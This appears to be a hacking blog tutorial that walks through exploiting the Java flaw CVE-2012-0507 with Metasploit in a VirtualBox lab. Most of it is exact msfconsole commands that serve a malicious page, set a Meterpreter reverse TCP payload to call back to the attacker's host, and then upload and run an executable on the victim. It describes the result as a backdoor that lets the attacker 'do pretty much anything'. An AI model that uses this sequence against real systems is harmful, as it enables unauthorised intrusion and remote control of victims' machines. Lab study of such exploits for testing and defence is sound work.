How to Hack Remote Computer using Metasploit by exploiting Java Vulnerability

On this post  i am going to demonstrate how to use the Metasploit tool to exploit the popular java AtomicReferenceArray Type Violation vulnerability(CVE-2012-0507).

Requirements:

VirtualBox
Target OS(windows,...)
PenTesting Distro(Backtrack )
JRE 6(unpatched version)

I am assuming you already know how to set up virtual machines and how to install backtrack etc

Part I: Preparing the Target Machine:
Start the "Target" Machine.
Install the JRE 6.

Part II: Preparing the PenTesting Machine:
Now, start the BT5.

Open the Terminal and Type "msfupdate". This will update the Metasploit Framework(MSF) with the latest exploits and Payloads. As CVE-2012-0507 is latest vulnerability, you have to update the MSF before proceeding further.

Part III :
Exploiting the Java AtomicReferenceArray Type Violation Vulnerability:

Step 1:
Open the Terminal and type "msfconsole". This will bring the Metasploit console , here you can interact with the MSF.

Step 2:
Type "use exploit/multi/browser/java_atomicreferencearray" . This command will use the java_atomicreferencearray.rb module for the attack.

Now type "show options" to display the which settings are available and/or required for this specific module.

Then type "set SRVPORT 80".
and "set URIPATH /".

Step 3: Set Payload
Type "show payloads", this will displays the list of payloads. We are going to use the 'reverse_tcp' payload. This payload will get reverse tcp connection from the Target to PenTesting machine.

Type 'set payload java/meterpreter/reverse_tcp' in the console.

set LHOST [IP_address] : In order to get reverse connection, we have to set our IP in the LHOST.

open the Terminal and type "ifconfig". This will display the IP info of our PenTesting Machine. The IP will be "192.168.56.x". E.g, let me say the ip is 192.168.56.10.

Now Type in the msfconsole as "set LHOST 192.168.56.10".

Part IV: Breaching the Target Machine:

So , are you ready?! Let us break into the Target Machine.

Step 1:
Type "exploit" in the msfconsole. This will start the reverse handler to our Machine and it will wait anyone that will connect to the our HTTP server (Eg: http://192.168.56.10/). Once victim connect to our server, it will send a jar will that will exploit the CVE-2012-0507 vulnerability.

step 2:

Open the Firefox/IE in the Target machine.
Enter "http://192.168.56.10/".
It loads nothing but exploit will run in the background.
Step 3:
Open the BT5 machine,

Now type "sessions", this will show the list of active sessions .

Type "sessions -i 1", this will open the connection to the session with the id '1' and bring you to Meterpreter. Meterpreter will help you to interact/control with the Target.

Step 4:Upload files
We got backdoor to the Target machine :) , now we can run any commands in the Target.

For Example, Typing 'sysinfo' will display the system information.

You can also upload and execute your own executable files in the Target machine.

'upload /Test.exe c:\\", this command will upload the Test.exe from the root('file system' dir) folder of the BT5 to the C drive of the Target.

'execute -f C:\\Test.exe", this command will run our uploaded File in the Target.

There you have it.. Now you are in the remote computer and you can do pretty much anything :)